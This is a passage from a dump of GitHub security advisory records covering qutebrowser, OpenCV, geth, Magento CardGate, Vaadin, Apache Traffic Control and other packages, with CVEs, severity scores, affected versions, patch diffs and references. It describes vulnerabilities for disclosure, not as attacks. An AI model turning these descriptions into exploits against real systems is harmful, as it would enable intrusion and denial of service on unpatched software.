+### Patches +The issue has been fixed in [qutebrowser v2.4.0](https://github.com/qutebrowser/qutebrowser/releases/tag/v2.4.0) in commit 8f46ba3f6dc7b18375f7aa63c48a1fe461190430. + +The fix also adds additional hardening for potential similar issues on Linux (by adding the new `--untrusted-args` flag to the `.desktop` file), though no such vulnerabilities are known. + +Backported patches for older versions are available, but no further releases are planned: + +- v1.7.x: d1ceaab +- v1.8.x: ca7155d +- v1.9.x: 157d871 +- v1.10.x: 94a6125 +- v1.11.x: 10acfbb +- v1.12.x: 363a18f +- v1.13.x: 410f262 +- v1.14.x: e4f4d93 +- v2.0.x: 15a1654 +- v2.1.x: 509ddf2 +- v2.2.x: 03dcba5 +- v2.3.x: 00a694c + +(commits are referring to qutebrowser/qutebrowser on GitHub) + +### Workarounds +Remove qutebrowser from the default browser settings entirely, so that it does not handle any kind of URLs. Make sure to remove *all* handlers, including an (accidental) `qutebrowserURL` handler, e.g. using [NirSoft URLProtocolView](https://www.nirsoft.net/utils/url_protocol_view.html). + +### Timeline +2021-10-15: Issue reported via security@qutebrowser.org by Ping Fan (Zetta) Ke of [Valkyrie-X Security Research Group (VXRL)](https://www.vxrl.hk/) +2021-10-15: Issue confirmed by @The-Compiler (lead developer), author of installer (@bitraid) contacted for help/review +2021-10-15: CVE assigned by GitHub +2021-10-15 to 2021-10-17: Fix developed +2021-10-17: Additional core developer (@toofar) contacted for help/review +2021-10-21: v2.4.0 released containing the fix +2021-10-21: Advisory and fix published + +### References +See the [commit message](https://github.com/qutebrowser/qutebrowser/commit/8f46ba3f6dc7b18375f7aa63c48a1fe461190430) for additional information and references to various similar issues in other projects. + +### Acknowledgements +Thanks to Ping Fan (Zetta) Ke of [Valkyrie-X Security Research Group](https://www.vxrl.hk/) (VXRL/@vxresearch) for finding and responsibly disclosing this issue. + +### Contact +If you have any questions or comments about this advisory, please email [security@qutebrowser.org](mailto:security@qutebrowser.org).","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'qutebrowser'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.7.0'}, {'fixed': '2.4.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/security/advisories/GHSA-vw27-fwjf-5qxm'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41146'}, {'type': 'WEB', 'url': 'https://github.com/qutebrowser/qutebrowser/commit/8f46ba3f6dc7b18375f7aa63c48a1fe461190430'}, {'type': 'PACKAGE', 'url': 'https://github.com/qutebrowser/qutebrowser'}]","{'cwe_ids': ['CWE-641', 'CWE-77', 'CWE-88'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-21T20:46:42Z', 'nvd_published_at': '2021-10-21T18:15:00Z'}" +1.4.0,GHSA-pqjj-6f5q-gqph,2021-10-08T14:35:41Z,2021-10-12T22:01:34Z,,['CVE-2017-12602'],Denial of Service in OpenCV,"OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has a denial of service (memory consumption) issue, as demonstrated by the 10-opencv-dos-memory-exhaust test case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12602'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9311'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': [], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T14:35:41Z', 'nvd_published_at': None}" +1.4.0,GHSA-8w3x-457r-wg53,2021-11-18T00:08:10Z,2021-10-12T22:00:41Z,,['CVE-2017-12597'],Out-of-bounds Write in OpenCV,OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to opencv-python and opencv-contrib-python through 3.3.0.9) has an out-of-bounds write error in the function FillColorRow1 in utils.cpp when reading an image file by using cv::imread.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12597'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/11'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/9'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T17:28:40Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}" +1.4.0,GHSA-vc29-rj92-gc7j,2021-11-18T15:33:38Z,2021-10-12T22:02:12Z,,['CVE-2017-12606'],Out-of-bounds Write in OpenCV,OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python and OpenCV-Contrib-Python 3.3.0.9) has an out-of-bounds write error in the function FillColorRow4 in utils.cpp when reading an image file by using cv::imread.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12606'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T20:49:52Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}" +1.4.0,GHSA-fw99-f933-rgh8,2021-10-07T15:09:42Z,2021-10-12T22:09:31Z,,['CVE-2019-14492'],Out-of-bounds Read and Out-of-bounds Write in OpenCV,"An issue was discovered in OpenCV before 3.4.7 and 4.x before 4.1.1 (OpenCV-Python before 3.4.7.28 and 4.x before 4.1.1.26). There is an out of bounds read/write in the function HaarEvaluator::OptFeature::calc in modules/objdetect/src/cascadedetect.hpp, which leads to denial of service.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.4.7.28'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.4.6.27'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '4.0.0.21'}, {'fixed': '4.1.1.26'}]}], 'database_specific': {'last_known_affected_version_range': '<= 4.1.0.25'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-14492'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/15124'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/compare/33b765d...4a7ca5a'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/compare/371bba8...ddbd10c'}, {'type': 'WEB', 'url': 'http://lists.opensuse.org/opensuse-security-announce/2019-12/msg00025.html'}]","{'cwe_ids': ['CWE-125', 'CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-07T15:09:42Z', 'nvd_published_at': '2019-08-01T17:15:00Z'}" +1.4.0,GHSA-xrpj-f9v6-2332,2021-10-18T19:08:54Z,2021-10-04T20:12:45Z,2021-10-18T19:05:16Z,[],CSV injection in Craft CMS,"# Withdrawn + +Duplicate of GHSA-h7vq-5qgw-jwwq","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'craftcms/cms'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.7.14'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/craftcms/cms/security/advisories/GHSA-h7vq-5qgw-jwwq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41824'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/commit/c9cb2225f1b908fb1e8401d401219228634b26b2'}, {'type': 'PACKAGE', 'url': 'https://github.com/craftcms/cms'}, {'type': 'WEB', 'url': 'https://github.com/craftcms/cms/blob/develop/CHANGELOG.md#3714---2021-09-28'}, {'type': 'WEB', 'url': 'https://twitter.com/craftcmsupdates/status/1442928690145366018'}]","{'cwe_ids': ['CWE-1236', 'CWE-74'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-01T19:01:45Z', 'nvd_published_at': None}" +1.4.0,GHSA-fr26-qjc8-mvjx,2021-10-13T17:45:05Z,2021-10-13T18:56:12Z,,[],"Possible route enumeration in production mode via RouteNotFoundError view in Vaadin 10, 11-14, and 15-19","Improper sanitization of path in default `RouteNotFoundError` view in `com.vaadin:flow-server` versions 1.0.0 through 1.0.14 (Vaadin 10.0.0 through 10.0.18), 1.1.0 prior to 2.0.0 (Vaadin 11 prior to 14), 2.0.0 through 2.6.1 (Vaadin 14.0.0 through 14.6.1), and 3.0.0 through 6.0.9 (Vaadin 15.0.0 through 19.0.8) allows network attacker to enumerate all available routes via crafted HTTP request when application is running in production mode and no custom handler for `NotFoundException` is provided.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.0.0'}, {'fixed': '1.0.15'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '1.1.0'}, {'fixed': '2.6.2'}]}]}, {'package': {'ecosystem': 'Maven', 'name': 'com.vaadin:flow-server'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '6.0.10'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/vaadin/flow/security/advisories/GHSA-fr26-qjc8-mvjx'}, {'type': 'WEB', 'url': 'https://vaadin.com/security/cve-2021-31412'}]","{'cwe_ids': [], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:45:05Z', 'nvd_published_at': None}" +1.4.0,GHSA-w96g-3p64-63wr,2021-11-18T00:06:27Z,2021-10-12T22:01:23Z,,['CVE-2017-12601'],Improper Restriction of Operations within the Bounds of a Memory Buffer in OpenCV ,"OpenCV (Open Source Computer Vision Library) through 3.3 (corresponding to OpenCV-Python 3.3.0.9) has a buffer overflow in the cv::BmpDecoder::readData function in modules/imgcodecs/src/grfmt_bmp.cpp when reading an image file by using cv::imread, as demonstrated by the 4-buf-overflow-readData-memcpy test case.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.3.1.11'}]}], 'database_specific': {'last_known_affected_version_range': '<= 3.3.0.9'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2017-12601'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/9309'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/pull/9376'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/11'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/9'}, {'type': 'WEB', 'url': 'https://github.com/xiaoqx/pocs/blob/master/opencv.md'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2018/07/msg00030.html'}, {'type': 'WEB', 'url': 'https://lists.debian.org/debian-lts-announce/2021/10/msg00028.html'}, {'type': 'WEB', 'url': 'https://security.gentoo.org/glsa/201712-02'}]","{'cwe_ids': ['CWE-119', 'CWE-120'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T14:40:39Z', 'nvd_published_at': '2017-08-07T01:29:00Z'}" +1.4.0,GHSA-m6vm-8g8v-xfjh,2022-04-20T19:15:08Z,2021-10-12T22:23:13Z,,['CVE-2019-5063'],Out-of-bounds Write in OpenCV,"An exploitable heap buffer overflow vulnerability exists in the data structure persistence functionality of OpenCV 4.1.0 (corresponds with OpenCV-Python 4.1.0.25). A specially crafted XML file can cause a buffer overflow, resulting in multiple heap corruptions and potential code execution. An attacker can provide a specially crafted file to trigger this vulnerability.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'opencv-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.1.0.25'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.1.0.25'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.1.0.25'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'opencv-contrib-python-headless'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '4.1.0.25'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-5063'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv/issues/16951'}, {'type': 'PACKAGE', 'url': 'https://github.com/opencv/opencv-python'}, {'type': 'WEB', 'url': 'https://github.com/opencv/opencv-python/releases/tag/25'}, {'type': 'WEB', 'url': 'https://talosintelligence.com/vulnerability_reports/TALOS-2019-0852'}, {'type': 'WEB', 'url': 'https://www.oracle.com//security-alerts/cpujul2021.html'}, {'type': 'WEB', 'url': 'https://www.oracle.com/security-alerts/cpuApr2021.html'}]","{'cwe_ids': ['CWE-787'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-06T17:40:07Z', 'nvd_published_at': '2020-01-03T17:15:00Z'}" +1.4.0,GHSA-qf6q-qfwp-vp44,2021-10-08T22:34:05Z,2021-10-12T16:30:58Z,,['CVE-2020-8818'],Origin Validation Error in Magento 2,"An issue was discovered in the CardGate Payments plugin through 2.0.30 for Magento 2. Lack of origin authentication in the IPN callback processing function in Controller/Payment/Callback.php allows an attacker to remotely replace critical plugin settings (merchant ID, secret key, etc.) and therefore bypass the payment process (e.g., spoof an order status by manually sending an IPN callback request with a valid signature but without real payment) and/or receive all of the subsequent payments.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'cardgate/magento2'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.33'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8818'}, {'type': 'WEB', 'url': 'https://github.com/cardgate/magento2/issues/54'}, {'type': 'PACKAGE', 'url': 'https://github.com/cardgate/magento2'}, {'type': 'WEB', 'url': 'https://github.com/cardgate/magento2/blob/715979e54e1a335d78a8c5586f9e9987c3bf94fd/Controller/Payment/Callback.php#L88-L107'}, {'type': 'WEB', 'url': 'https://github.com/cardgate/magento2/releases/tag/v2.0.33'}, {'type': 'WEB', 'url': 'http://packetstormsecurity.com/files/156505/Magento-WooCommerce-CardGate-Payment-Gateway-2.0.30-Bypass.html'}]","{'cwe_ids': ['CWE-346'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:34:05Z', 'nvd_published_at': '2020-02-25T02:15:00Z'}" +1.4.0,GHSA-59hh-656j-3p7v,2023-08-29T18:55:39Z,2021-10-25T19:42:57Z,,['CVE-2021-41173'],Geth Node Vulnerable to DoS via maliciously crafted p2p message ,"### Impact + +A vulnerable node is susceptible to crash when processing a maliciously crafted message from a peer, via the `snap/1` protocol. The crash can be triggered by sending a malicious `snap/1` `GetTrieNodes` package. + +### Details + +On September 21, 2021, geth-team member Gary Rong (@rjl493456442) found a way to crash the snap request handler . +By using this vulnerability, a peer connected on the `snap/1` protocol could cause a vulnerable node to crash with a `panic`. + +In the `trie.TryGetNode` implementation, if the requested path is reached, the associated node will be returned. However the nilness is +not checked there. + +```golang +func (t *Trie) tryGetNode(origNode node, path []byte, pos int) (item []byte, newnode node, resolved int, err error) { + // If we reached the requested path, return the current node + if pos >= len(path) { + // Although we most probably have the original node expanded, encoding + // that into consensus form can be nasty (needs to cascade down) and + // time consuming. Instead, just pull the hash up from disk directly. + var hash hashNode + if node, ok := origNode.(hashNode); ok { + hash = node + } else { + hash, _ = origNode.cache() + } +``` +More specifically the `origNode` can be nil(e.g. the child of fullnode) and system can panic at line `hash, _ = origNode.cache()`. + +When investigating this, @holiman tried to find it via fuzzing, which uncovered a second crasher, also related to the snap `GetTrieNodes` package. If the caller requests a storage trie: +```golang + // Storage slots requested, open the storage trie and retrieve from there + account, err := snap.Account(common.BytesToHash(pathset[0])) + loads++ // always account database reads, even for failures + if account == nil { + break + } + stTrie, err := trie.NewSecure(common.BytesToHash(account.Root), triedb) +``` +The code assumes that `snap.Account` returns _either_ a non-nil response unless `error` is also provided. This is however not the case, since `snap.Account` can return `nil, nil`. + +### Patches + +```diff +--- a/eth/protocols/snap/handler.go ++++ b/eth/protocols/snap/handler.go +@@ -469,7 +469,7 @@ func handleMessage(backend Backend, peer *Peer) error { + // Storage slots requested, open the storage trie and retrieve from there + account, err := snap.Account(common.BytesToHash(pathset[0])) + loads++ // always account database reads, even for failures +- if err != nil { ++ if err != nil || account == nil { + break + } + stTrie, err := trie.NewSecure(common.BytesToHash(account.Root), triedb) +diff --git a/trie/trie.go b/trie/trie.go +index 7ea7efa835..d0f0d4e2bc 100644 +--- a/trie/trie.go ++++ b/trie/trie.go +@@ -174,6 +174,10 @@ func (t *Trie) TryGetNode(path []byte) ([]byte, int, error) { + } + + func (t *Trie) tryGetNode(origNode node, path []byte, pos int) (item []byte, newnode node, resolved int, err error) { ++ // If non-existent path requested, abort ++ if origNode == nil { ++ return nil, nil, 0, nil ++ } + // If we reached the requested path, return the current node + if pos >= len(path) { + // Although we most probably have the original node expanded, encoding +@@ -193,10 +197,6 @@ func (t *Trie) tryGetNode(origNode node, path []byte, pos int) (item []byte, new + } + // Path still needs to be traversed, descend into children + switch n := (origNode).(type) { +- case nil: +- // Non-existent path requested, abort +- return nil, nil, 0, nil +- + case valueNode: + // Path prematurely ended, abort + return nil, nil, 0, nil + +``` +The fixes were merged into [#23657](https://github.com/ethereum/go-ethereum/pull/23657), with commit [f1fd963](https://github.com/ethereum/go-ethereum/pull/23657/commits/f1fd963a5a965e643e52fcf805a2a02a323c32b8), and released as part of Geth [v1.10.9](https://github.com/ethereum/go-ethereum/tree/v1.10.9) on Sept 29, 2021. + +### Workarounds + +Apply the patch above or upgrade to a version which is not vulnerable. + +### For more information +If you have any questions or comments about this advisory: +* Open an issue in [go-ethereum](https://github.com/ethereum/go-ethereum/) +* Email us at [security@ethereum.org](mailto:security@ethereum.org) +","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/ethereum/go-ethereum'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.10.9'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/security/advisories/GHSA-59hh-656j-3p7v'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-41173'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/23657/commits/f1fd963a5a965e643e52fcf805a2a02a323c32b8'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/pull/23801'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/commit/e40b37718326b8b4873b3b00a0db2e6c6d9ea738'}, {'type': 'PACKAGE', 'url': 'https://github.com/ethereum/go-ethereum'}, {'type': 'WEB', 'url': 'https://github.com/ethereum/go-ethereum/releases/tag/v1.10.9'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/vuln/GO-2022-0256'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-25T18:23:10Z', 'nvd_published_at': '2021-10-26T14:15:00Z'}" +1.4.0,GHSA-gw97-f6h8-gm94,2021-10-20T17:07:20Z,2021-10-13T18:55:04Z,,['CVE-2021-42009'],Email relay in Apache Traffic Control,"An authenticated Apache Traffic Control Traffic Ops user with Portal-level privileges can send a request with a specially-crafted email subject to the /deliveryservices/request Traffic Ops endpoint to send an email, from the Traffic Ops server, with an arbitrary body to an arbitrary email address. Apache Traffic Control 5.1.x users should upgrade to 5.1.3 or 6.0.0. 4.1.x users should upgrade to 5.1.3.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/apache/trafficcontrol'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '5.1.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-42009'}, {'type': 'PACKAGE', 'url': 'https://github.com/apache/trafficcontrol'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r78d471d8a4fd268a4c5ae6c47327c09d9d4b4467c31da2c97422febb@%3Cdev.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r7dfa9a89b39d06caeeeb7b5cdc41b3493a9b86cc6cfa059d3f349d87@%3Cannounce.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/re384fd0f44c6d230f31376153c6e8b59e4a669f927c1533d06d702af%40%3Cdev.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/rf0481b9e38ece1ece458d3ce7b2d671df819e3555597f31fc34f084e%40%3Ccommits.trafficcontrol.apache.org%3E'}, {'type': 'WEB', 'url': 'http://www.openwall.com/lists/oss-security/2021/10/12/1'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-13T17:43:05Z', 'nvd_published_at': '2021-10-12T08:15:00Z'}" +1.4.0,GHSA-pm77-c4q7-3fwj,2021-10-08T22:58:55Z,2021-10-12T16:31:12Z,,['CVE-2019-20455'],Improper Certificate Validation in Heartland & Global Payments PHP SDK,Gateways/Gateway.php in Heartland & Global Payments PHP SDK before 2.0.0 does not enforce SSL certificate validations.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N'}]","[{'package': {'ecosystem': 'Packagist', 'name': 'globalpayments/php-sdk'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.0.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2019-20455'}, {'type': 'WEB', 'url': 'https://github.com/globalpayments/php-sdk/pull/8'}, {'type': 'WEB', 'url': 'https://github.com/globalpayments/php-sdk/pull/8/commits/c86e18f28c5eba0d6ede7d557756d978ea83d3c9'}, {'type': 'PACKAGE', 'url': 'https://github.com/globalpayments/php-sdk'}, {'type': 'WEB', 'url': 'https://github.com/globalpayments/php-sdk/compare/1.3.3...2.0.0'}, {'type': 'WEB', 'url': 'https://github.com/globalpayments/php-sdk/releases/tag/2.0.0'}, {'type': 'WEB', 'url': 'https://winterdragon.ca/global-payments-vulnerability/'}]","{'cwe_ids': ['CWE-295'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-10-08T22:58:55Z', 'nvd_published_at': '2020-02-14T16:15:00Z'}" +1.4.0,GHSA-362v-wg5p-64w2,2021-10-20T17:28:19Z,2021-10-12T18:41:16Z,,['CVE-2021-42135'],Incorrect Privilege Assignment in HashiCorp Vault,"HashiCorp Vault and Vault Enterprise 1.8.x through 1.8.4 may have an unexpected interaction 